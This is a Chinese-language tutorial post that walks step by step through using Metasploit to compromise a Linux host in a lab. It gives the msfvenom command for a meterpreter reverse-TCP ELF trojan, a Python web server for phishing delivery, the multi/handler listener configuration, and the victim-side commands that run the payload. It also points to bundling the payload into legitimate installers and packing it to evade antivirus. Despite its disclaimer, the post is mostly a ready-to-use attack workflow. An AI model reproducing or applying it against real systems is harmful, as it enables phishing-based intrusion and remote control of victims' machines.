MSF 反弹 Shell 实战教程:从生成木马到获取服务器权限
声明:本文仅用于技术交流与安全防御研究,请勿用于非法用途。
一、这篇文章讲什么?
很多新手拿到 MSF(Metasploit Framework)不知道从哪里开始。这篇文章不讲复杂原理,只讲怎么一步步用 MSF 拿到一台 Linux 服务器的权限。
你可以把它当成一份 MSF 使用教程,跟着敲命令就能看到效果。
二、环境说明
靶机:CentOS 7(192.168.66.136)
攻击机:Kali Linux(192.168.66.130)
三、核心流程(就三步)
第一步:生成木马 → 第二步:监听等待 → 第三步:让靶机运行木马
四、复现步骤
真实攻防演练中,攻击者不一定会找到 Web 漏洞。钓鱼 + 社会工程学是最常见的突破口——构造一个仿真的网站让受害者访问,诱使受害者下载运行木马。
第一步:在 Kali 上生成木马 payload
# 使用 msfvenom 生成 Linux 反弹 shell(ELF 格式) msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.66.130 LPORT=4444 -f elf -o shell.elf参数说明:
-p linux/x64/meterpreter/reverse_tcp:Linux 64 位的 meterpreter 反向 TCP payloadLHOST=192.168.66.130:Kali(攻击机)的 IPLPORT=4444:Kali 上监听的端口-f elf:输出 ELF 可执行文件格式
实际攻击中,攻击者会使用捆绑器(如msfvenom -x)将 payload 注入到正常的 PDF 阅读器或安装包中,或对 ELF 文件进行加壳混淆,以降低杀软查杀率。本文聚焦后渗透阶段,故使用裸 payload 演示。
第二步:布置钓鱼页面,诱导下载
攻击者在 Kali 上搭建一个模拟的网站让靶机访问,点击shell.elf将木马下载到靶机(关闭防火墙)
# Kali 上起一个 HTTP 服务,提供木马下载 python3 -m http.server 2233第三步:启动 MSF handler 等待回连
# 在 Kali 上启动 MSF 监听 msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.66.130 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > exploit -j # [*] Started reverse TCP handler on 192.168.66.130:4444第四步:受害者下载并运行木马,在 Kali 上看到 session 建立
# 受害者(靶机的 cai 用户)下载木马elf后执行 chmod +x /home/cai/下载/shell.elf /home/cai/下载/shell.elf &攻击者现在通过 meterpreter 完全控制了目标机器,权限为运行木马的cai(普通用户)。
